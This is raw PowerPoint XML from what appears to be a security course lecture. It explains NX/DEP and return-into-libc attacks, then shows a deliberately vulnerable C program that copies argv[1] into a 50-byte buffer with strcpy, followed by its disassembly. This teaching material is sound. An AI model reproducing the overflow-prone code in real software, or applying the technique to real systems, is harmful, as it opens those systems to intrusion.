          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The idea behind the NX bit (W^X/DEP) is to never have memory that is both writable and executable at the same time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Certain applications, like JIT-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> interpreters, might require this feature</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="101609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106" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Return-into-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1199107" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the stack is protected from execution, the overflow can be used to set a fake call frame that will be invoked when ret is executed by the currently executing function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Any function that is currently linked can be executed </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can be used to copy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> into executable areas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attacker needs to be able to locate the address of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> function in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Debugger, /proc/maps</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="65850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9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99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991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991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991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991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953" y="305134"/>
            <a:ext cx="4840977" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, char** </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>{   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>foo [50];   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(foo, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 10;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>326</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5068261" y="190041"/>
            <a:ext cx="5832763" cy="666795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2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  push </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endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,</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endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sub $0x3c,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0xc(</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a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>),</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eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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mr-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$0x4,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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mr-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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mr-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,0x4(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">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mr-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>lea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-0x32(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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mr-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">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call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
